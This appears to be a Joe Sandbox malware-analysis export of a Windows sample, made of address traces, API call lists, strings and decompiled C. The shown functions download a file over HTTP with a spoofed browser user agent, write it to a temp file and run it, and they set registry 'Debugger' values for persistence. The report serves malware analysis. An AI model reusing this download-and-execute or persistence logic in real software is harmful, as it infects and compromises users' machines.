0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x0040459a
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045cd
0x004045cf
0x004045d2
0x00000000
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x00000000
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x004047b5
0x00000000
0x0040464d
0x00404644

APIs

RegCreateKeyA.ADVAPI32(80000002,00408720,?), ref: 0040458D
GetSystemDirectoryA.KERNEL32 ref: 004045A7
lstrcat.KERNEL32(?,0041103E), ref: 004045B8
lstrcat.KERNEL32(00000000,?), ref: 004045BE
CreateMutexA.KERNEL32(00000000,00000000,00407AE0,00000000,?,0041103E,?,00000104,80000002,00408720,?), ref: 004045DE
WaitForSingleObject.KERNEL32(00000000,00002710,00000000,00000000,00407AE0,00000000,?,0041103E,?,00000104,80000002,00408720,?), ref: 004045F4
CloseHandle.KERNEL32(?,00000000,00002710,00000000,00000000,00407AE0,00000000,?,0041103E,?,00000104,80000002,00408720,?), ref: 00404600
Sleep.KERNEL32(000007D0,00000000,00000000,00407AE0,00000000,?,0041103E,?,00000104,80000002,00408720,?), ref: 0040460C
SetFileAttributesA.KERNEL32(?,00000080,000007D0,00000000,00000000,00407AE0,00000000,?,0041103E,?,00000104,80000002,00408720,?), ref: 0040461E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,00407AE0,00000000,?,0041103E), ref: 00404636
WriteFile.KERNEL32(00000000,00407B20,00000C00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404668
lstrlen.KERNEL32(?,00000000,00407B20,00000C00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 004046B6
lstrcpy.KERNEL32(?,?), ref: 004046EB
WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?,00000000,?,40000000,00000000), ref: 0040471B
SetFileTime.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?), ref: 0040474D
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,00000000,00407B20,00000C00,?,00000000,?,40000000), ref: 00404759
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?), ref: 00404775
RegDeleteValueA.ADVAPI32(?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?), ref: 00404786

Part of subcall function 00401251: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411035,00000004), ref: 004012B2

lstrlen.KERNEL32(?,?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000), ref: 00404798
RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,Debugger,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047B0
RegCloseKey.ADVAPI32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,00407AE0,00000000,?), ref: 004047C4
GetComputerNameA.KERNEL32 ref: 004047DE
lstrcpy.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v), ref: 004047FE
lstrcpy.KERNEL32(?,?), ref: 0040480E
lstrlen.KERNEL32(?,?,?), ref: 0040482B
wsprintfA.USER32 ref: 004048CF

Strings

{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}, xrefs: 004048C5
Debugger, xrefs: 0040477A, 004047A4
f, xrefs: 0040467A
QlC5hT0yHn63XEm5LqJ2OxSkGj2v, xrefs: 004047F1

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$Create$CloseValuelstrcpylstrlen$HandleWritelstrcat$AttributesComputerDeleteDirectoryMutexNameObjectSingleSleepSystemTimeWaitwsprintf
String ID: Debugger$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$f${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}
API String ID: 601675314-4017334698
Opcode ID: 5d5810463db3448af7570b20dafc215ce533a0388cc6d29e9598b3e6ad3a6499
Instruction ID: 54dbcc9571b8fe088a9b1486dd0164562ca2f985fb6eb90898113ffa304c7d2c
Opcode Fuzzy Hash: 5d5810463db3448af7570b20dafc215ce533a0388cc6d29e9598b3e6ad3a6499
Instruction Fuzzy Hash: 9981BFB1108785A9D731E7608C85FEF7AEC9B85304F50482BB6C9F60C2D67C96458B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040211B Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 243
filestringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0040211B(void* __eax, signed int __edx, char _a72, char _a80, char _a4160, char _a4168, char _a4440, char _a4712, signed char* _a4988, intOrPtr _a5004, signed int _a5016) {
				char _v8;
				void* _v20;
				void _v24;
				long _v28;
				signed int _t47;
				char* _t50;
				char* _t52;
				char* _t54;
				char* _t56;
				void* _t58;
				char* _t59;
				CHAR* _t61;
				long _t62;
				void* _t65;
				long _t69;
				CHAR* _t75;
				CHAR* _t76;
				void* _t93;
				CHAR* _t105;
				void* _t106;
				struct _STARTUPINFOA* _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;
				signed char* _t111;
				signed int _t112;
				long _t120;
				void* _t122;
				signed int _t124;
				signed int _t126;
				DWORD* _t129;

				_t112 = __edx;
				_push(__eax);
				E00405C00();
				_t124 = __edx;
				_t126 = _a5016;
				_t111 = _a4988;
				while(1) {
					_t47 =  *_t111 & 0x000000ff;
					_t112 = _t112 & 0xffffff00 | _t47 == 0x00000020;
					_t49 = _t47 & 0xffffff00 | _t47 == 0x00000009 | _t112;
					if(((_t47 & 0xffffff00 | _t47 == 0x00000009 | _t112) & 0x00000001) == 0) {
						break;
					}
					_t111 =  &(_t111[1]);
				}
				_push(_t111);
				_t104 =  &_a80;
				_push( &_a80);
				L00405E20();
				_t50 = E0040134D(_t49, 0xd);
				if(_t50 != 0) {
					 *_t50 = 0;
				}
				_t52 = E0040134D(_t104, 0xa);
				if(_t52 != 0) {
					 *_t52 = 0;
				}
				_t54 = E0040134D(_t104, 0x20);
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				_t56 = E0040134D(_t104, 9);
				if(_t56 != 0) {
					 *_t56 = 0;
				}
				if((_t126 & 0x00000002) == 0) {
					_t58 = E004019E8(_t104, _t124, 1);
				} else {
					_t58 = E00401CB0(_t104);
				}
				_t125 = _t58;
				_t59 = "urlinj_conn";
				if(_t58 == 0) {
					L40:
					E00401FBB(_t59);
					_t61 = 0;
				} else {
					_t105 =  &_a4712;
					_t62 = GetTempPathA(0x104, _t105);
					if(_a5004 == 0) {
						GetTempFileNameA(_t105, "tmp", 0,  &_a4440);
					} else {
						_push(_a5004);
						_push(0x41103e);
						_push(_t105);
						_push( &_a4440);
						L00405E20();
						_push(_t62);
						L00405E30();
						_push(_t62);
						L00405E30();
					}
					_t65 = CreateFileA( &_a4440, 0x40000000, 0, 0, 2, 0x80, 0);
					_t106 = _t65;
					if(_t65 == 0 || _t65 == 0xffffffff) {
						E00401F59(_t125);
						_t59 = "urlinj_creat";
						goto L40;
					} else {
						while(1) {
							_t122 =  &_a72;
							_t69 = E00401E00(_t125, _t122, 0x1000);
							_v28 = _t69;
							_t120 = _t69;
							if(_t120 == 0) {
								break;
							}
							if(_t120 != 0xffffffff) {
								WriteFile(_t106, _t122, _t120,  &_v28, 0);
								continue;
							}
							break;
						}
						E00401F59(_t125);
						CloseHandle(_t106);
						if(_v28 == 0) {
							if((_t126 & 0x00000001) == 0) {
								L31:
								_t107 =  &_v8;
								GetStartupInfoA(_t107);
								_push( &_v24);
								_t75 = 0;
								_push(_t107);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								if((_t126 & 0x00000001) != 0) {
									_t75 =  &_a4440;
								}
								_push(_t75);
								if((_t126 & 0x00000001) == 0) {
									_t76 =  &_a4440;
								} else {
									_t76 =  &_a4168;
								}
								if(CreateProcessA(_t76, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) {
									CloseHandle(_v20);
									_t108 = E00401000(0x20c);
									 *_t108 = _v24;
									_t40 = _t108 + 4; // 0x4
									_push( &_a4440);
									L00405E20();
									if((_t126 & 0x00000001) == 0) {
										 *((char*)(_t108 + 0x108)) = 0;
									} else {
										_push( &_a4160);
										_t42 = _t108 + 0x108; // 0x108
										L00405E20();
									}
									CloseHandle(CreateThread(0, 0x10000, E004020E2, _t108, 0, _t129));
									_t61 = 1;
								} else {
									DeleteFileA( &_a4440);
									if((_t126 & 0x00000001) != 0) {
										DeleteFileA( &_a4168);
									}
									_t59 = "urlinj_fork";
									goto L40;
								}
							} else {
								_t109 =  &_a4168;
								GetTempFileNameA( &_a4712, "tmp", 0, _t109);
								_t93 = CreateFileA(_t109, 0x40000000, 0, 0, 2, 0x80, 0);
								_t110 = _t93;
								if(_t93 == 0 || _t93 == 0xffffffff) {
									DeleteFileA( &_a4440);
									_t59 = "urlinj_creat_f";
									goto L40;
								} else {
									WriteFile(_t110, 0x40fa40, 0x600,  &_v28, 0);
									CloseHandle(_t110);
									goto L31;
								}
							}
						} else {
							DeleteFileA( &_a4440);
							_t59 = "urlinj_xfer";
							goto L40;
						}
					}
				}
				return _t61;
			}

0x0040211b
0x0040211f
0x00402125
0x00402131
0x00402133
0x0040213a
0x0040213c
0x0040213c
0x00402141
0x00402149
0x0040214d
0x00000000
0x00000000
0x0040214f
0x0040214f
0x00402152
0x00402153
0x00402157
0x00402158
0x00402162
0x00402169
0x0040216b
0x0040216b
0x00402175
0x0040217c
0x0040217e
0x0040217e
0x00402188
0x0040218f
0x00402191
0x00402191
0x0040219b
0x004021a2
0x004021a4
0x004021a4
0x004021ad
0x004021be
0x004021af
0x004021b1
0x004021b1
0x004021c4
0x004021c8
0x004021cd
0x004023aa
0x004023aa
0x004023af
0x004021d3
0x004021d3
0x004021e0
0x004021f4
0x00402220
0x004021f6
0x004021f6
0x004021fd
0x00402202
0x00402203
0x00402204
0x00402209
0x0040220a
0x0040220f
0x00402210
0x00402210
0x0040223f
0x00402246
0x00402248
0x00402251
0x00402256
0x00000000
0x00402274
0x00402274
0x00402274
0x00402281
0x00402286
0x0040228a
0x0040228f
0x00000000
0x00000000
0x00402263
0x0040226f
0x00000000
0x0040226f
0x00000000
0x00402263
0x00402293
0x00402299
0x004022a2
0x004022c1
0x00402336
0x00402336
0x0040233b
0x00402344
0x00402345
0x0040234d
0x0040234e
0x00402350
0x00402352
0x00402354
0x00402356
0x00402358
0x0040235a
0x0040235c
0x0040235c
0x00402363
0x0040236a
0x00402375
0x0040236c
0x0040236c
0x0040236c
0x0040238b
0x004023b7
0x004023c6
0x004023cc
0x004023ce
0x004023d1
0x004023d3
0x004023db
0x004023f3
0x004023dd
0x004023e4
0x004023e5
0x004023ec
0x004023ec
0x00402412
0x00402417
0x0040238d
0x0040238e
0x00402396
0x004023a0
0x004023a0
0x004023a5
0x00000000
0x004023a5
0x004022c3
0x004022c3
0x004022da
0x004022f2
0x004022f9
0x004022fb
0x0040230a
0x0040230f
0x00000000
0x00402319
0x0040232b
0x00402331
0x00000000
0x00402331
0x004022fb
0x004022a4
0x004022ac
0x004022b1
0x00000000
0x004022b1
0x004022a2
0x00402248
0x00402426

APIs

lstrcpy.KERNEL32(?,?), ref: 00402158
GetTempPathA.KERNEL32(00000104,?,?,?,?,00000000,?,00000000,?,00402C02,00000000,00000000,?,Default Flags,00000000,00000003), ref: 004021E0
lstrcpy.KERNEL32(?,?), ref: 00402204
lstrcat.KERNEL32(00000000,?), ref: 0040220A
lstrcat.KERNEL32(00000000,00000000), ref: 00402210
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040223F

Part of subcall function 004019E8: lstrcpy.KERNEL32(?), ref: 00401A14
Part of subcall function 004019E8: lstrlen.KERNEL32(00000000,?), ref: 00401A1A
Part of subcall function 004019E8: htons.WS2_32(00000050), ref: 00401A7B
Part of subcall function 004019E8: socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
Part of subcall function 004019E8: closesocket.WS2_32(00000000), ref: 00401AF9
Part of subcall function 004019E8: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D

GetTempFileNameA.KERNEL32(?,tmp,00000000,?), ref: 00402220
WriteFile.KERNEL32(00000000,?,00000000,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040226F

Part of subcall function 00401E00: InternetReadFile.WININET(?,?,?,?), ref: 00401E24

CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 00402299
DeleteFileA.KERNEL32(?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 004022AC
GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 004022DA
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000000,?,40000000,00000000,00000000), ref: 004022F2
DeleteFileA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?,00000000,?,40000000,00000000), ref: 0040230A
WriteFile.KERNEL32(00000000,0040FA40,00000600,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040232B
CloseHandle.KERNEL32(00000000,00000000,0040FA40,00000600,00412190,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000), ref: 00402331
GetStartupInfoA.KERNEL32(00000000), ref: 0040233B
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,00000000,?,40000000,00000000,00000000), ref: 0040237D
DeleteFileA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,00000000,?,40000000,00000000), ref: 0040238E
DeleteFileA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,00000000,?,40000000), ref: 004023A0
CloseHandle.KERNEL32(00000012,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00412190,00000000,00000000,?,40000000,00000000), ref: 004023B7
lstrcpy.KERNEL32(00000004,?), ref: 004023D3
lstrcpy.KERNEL32(00000108,?), ref: 004023EC
CreateThread.KERNEL32 ref: 0040240C
CloseHandle.KERNEL32(00000000,00000000,00010000,004020E2,00000000,00000000,?,00000004,?,00000012,?,00000000,00000000,00000000,00000000,00000000), ref: 00402412

Strings

urlinj_fork, xrefs: 004023A5
urlinj_conn, xrefs: 004021C8
urlinj_creat, xrefs: 00402256
tmp, xrefs: 0040221A, 004022CD
urlinj_creat_f, xrefs: 0040230F
urlinj_xfer, xrefs: 004022B1

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$Internetlstrcpy$CloseCreateDeleteHandle$OptionTemp$NameWritelstrcat$InfoOpenPathProcessReadStartupThreadclosesockethtonslstrlensocket
String ID: tmp$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer
API String ID: 910217646-3391900140
Opcode ID: e5aa447fc9ca00fdae92db8a6c8c3abf24002789fef2bf7d6e053e9a14996efe
Instruction ID: 895ea3fb7fd56845c489c34011873c515f9ddc39e1368bf3964ea777627726e2
Opcode Fuzzy Hash: e5aa447fc9ca00fdae92db8a6c8c3abf24002789fef2bf7d6e053e9a14996efe
Instruction Fuzzy Hash: EB71E6712443406AE730A2B58D8EFEB229D9F84704F50443BBA84FA2D2D6FCD944866E

Uniqueness

Uniqueness Score: -1.00%

Function 004019E8 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 203
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004019E8(char* __eax, char** __edx, intOrPtr _a4) {
				void* _v16;
				char _v1028;
				char _v1033;
				char _v1040;
				char _v1168;
				char* _v1180;
				short _v1182;
				char _v1184;
				char _v1188;
				int _v1192;
				char* _v1196;
				signed int _v1200;
				void* _v1217;
				char** _t38;
				void* _t40;
				void* _t44;
				char* _t47;
				char* _t49;
				char* _t53;
				char* _t54;
				CHAR* _t61;
				int _t62;
				void* _t64;
				int _t66;
				char** _t70;
				void* _t74;
				char* _t75;
				char* _t77;
				CHAR* _t80;
				char* _t81;
				char* _t91;
				char** _t92;
				void* _t93;
				char* _t94;

				_t92 = __edx;
				_v1196 = __eax;
				if( *0x412030 > 4) {
					L24:
					if( *0x4121d0 == 0) {
						L32:
						_t38 = 0;
						L33:
						return _t38;
					}
					E00401832();
					_t40 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Win32)", 4, 0, 0, 0);
					_t93 = _t40;
					if(_t40 == 0) {
						goto L32;
					}
					_t74 =  &_v1192;
					_v1192 = 0x9c40;
					InternetSetOptionA(_t40, 2, _t74, 4);
					InternetSetOptionA(_t93, 6, _t74, 4);
					InternetSetOptionA(_t93, 5, _t74, 4);
					_t44 = InternetOpenUrlA(_t93, _v1196, 0, 0, 0x84280300, 0);
					_t75 = _t44;
					if(_t44 == 0) {
						InternetCloseHandle(_t93);
						goto L32;
					}
					if(_a4 != 0) {
						_t47 =  *0x412030; // 0x0
						if(_t47 <= 4) {
							 *0x412030 =  &(_t47[1]);
						}
					}
					_t38 = E00401000(0x14);
					 *_t38 = _t93;
					_t38[4] = 0;
					_t38[1] = _t75;
					goto L33;
				}
				_t49 =  &(__eax[7]);
				_t76 =  &_v1168;
				_push(_t49);
				_push( &_v1168);
				L00405E20();
				_push(_t49);
				L00405E40();
				_v1192 = _t49;
				_t91 = E0040134D( &_v1168, 0x2f);
				_t38 = 0;
				if(_t91 == 0) {
					goto L33;
				}
				 *_t91 = 0;
				_t53 = E0040134D(_t76, 0x3a);
				_v1200 = 0x50;
				if(_t53 != 0) {
					 *_t53 = 0;
					_v1200 = E0040136B(_t53 + 1,  &_v1188, 0) & 0x0000ffff;
					_pop(_t53);
				}
				_push(_v1200);
				L00406180();
				_v1182 = _t53;
				if(_t92 == 0) {
					_t77 =  &_v1168;
					_push(_t77);
					L00406190();
					_v1180 = _t53;
					_t54 = _t53 + 1;
					if(_t54 != 0) {
						goto L11;
					}
					_push(_t77);
					L004061A0();
					if(_t54 == 0) {
						goto L24;
					}
					_t70 =  *(_t54[0xc]);
					if(_t70 == 0) {
						goto L24;
					}
					_t54 =  *_t70;
					goto L10;
				} else {
					_t54 =  *_t92;
					L10:
					_v1180 = _t54;
					L11:
					_push(6);
					_push(1);
					_push(2);
					_v1184 = 2;
					L004061B0();
					_t94 = _t54;
					if(_t54 == 0xffffffff) {
						goto L24;
					}
					_push(0x28);
					if(E0040172D(_t54,  &_v1184) == 0) {
						E00405C00();
						_push(_v1200);
						_t80 =  &_v1217 & 0xfffffff0;
						_push( &_v1168);
						_t20 = _t91 + 1; // 0x1
						_t61 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
						if(_v1200 != 0x50) {
							_t61 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
						}
						_t62 = wsprintfA(_t80, _t61);
						_push(0);
						_push(_t62);
						_push(_t80);
						_t81 =  &_v1040;
						_push(_t94);
						_v1192 = _t62;
						L004061D0();
						_t64 = E00401625(_t94, _t81, 0x400, 0x28);
						if(_t64 <= 0xb) {
							goto L13;
						} else {
							_push("HTTP/1.0 200");
							_push(_t81);
							_v1033 = 0x30;
							_v1028 = 0;
							L00405E50();
							if(_t64 != 0) {
								goto L13;
							}
							while(1) {
								_t66 = E00401625(_t94,  &_v1040, 0x400, 0x28);
								_v1192 = _t66;
								if(_t66 == 0) {
									break;
								}
								if(_t66 + 1 == 0) {
									goto L13;
								}
							}
							if(_a4 != 0) {
								 *0x412030 = 0;
							}
							_t38 = E00401000(0x14);
							 *_t38 = 0;
							_t38[4] = 0;
							_t38[1] = _t94;
							goto L33;
						}
					}
					L13:
					_push(_t94);
					L004061C0();
					goto L24;
				}
			}

0x004019ed
0x004019fd
0x00401a03
0x00401bf0
0x00401bf7
0x00401ca6
0x00401ca6
0x00401ca8
0x00401caf
0x00401caf
0x00401bfd
0x00401c0f
0x00401c17
0x00401c19
0x00000000
0x00000000
0x00401c21
0x00401c2a
0x00401c35
0x00401c41
0x00401c4d
0x00401c65
0x00401c6d
0x00401c6f
0x00401ca0
0x00000000
0x00401ca0
0x00401c75
0x00401c77
0x00401c7f
0x00401c82
0x00401c82
0x00401c7f
0x00401c8c
0x00401c91
0x00401c93
0x00401c9a
0x00000000
0x00401c9a
0x00401a09
0x00401a0c
0x00401a12
0x00401a13
0x00401a14
0x00401a19
0x00401a1a
0x00401a1f
0x00401a31
0x00401a33
0x00401a37
0x00000000
0x00000000
0x00401a3d
0x00401a47
0x00401a4c
0x00401a58
0x00401a5a
0x00401a6e
0x00401a74
0x00401a74
0x00401a75
0x00401a7b
0x00401a80
0x00401a89
0x00401a8f
0x00401a95
0x00401a96
0x00401a9b
0x00401aa1
0x00401aa2
0x00000000
0x00000000
0x00401aa4
0x00401aa5
0x00401aac
0x00000000
0x00000000
0x00401ab5
0x00401ab9
0x00000000
0x00000000
0x00401abf
0x00000000
0x00401a8b
0x00401a8b
0x00401ac1
0x00401ac1
0x00401ac7
0x00401ac7
0x00401ac9
0x00401acb
0x00401acd
0x00401ad6
0x00401ade
0x00401ae0
0x00000000
0x00000000
0x00401ae6
0x00401af6
0x00401b11
0x00401b1a
0x00401b20
0x00401b31
0x00401b32
0x00401b36
0x00401b3b
0x00401b3d
0x00401b3d
0x00401b44
0x00401b49
0x00401b4b
0x00401b4c
0x00401b4d
0x00401b53
0x00401b54
0x00401b5a
0x00401b6a
0x00401b75
0x00000000
0x00401b77
0x00401b77
0x00401b7c
0x00401b7d
0x00401b84
0x00401b8b
0x00401b92
0x00000000
0x00000000
0x00401ba1
0x00401bb0
0x00401bb8
0x00401bbf
0x00000000
0x00000000
0x00401b9b
0x00000000
0x00000000
0x00401b9b
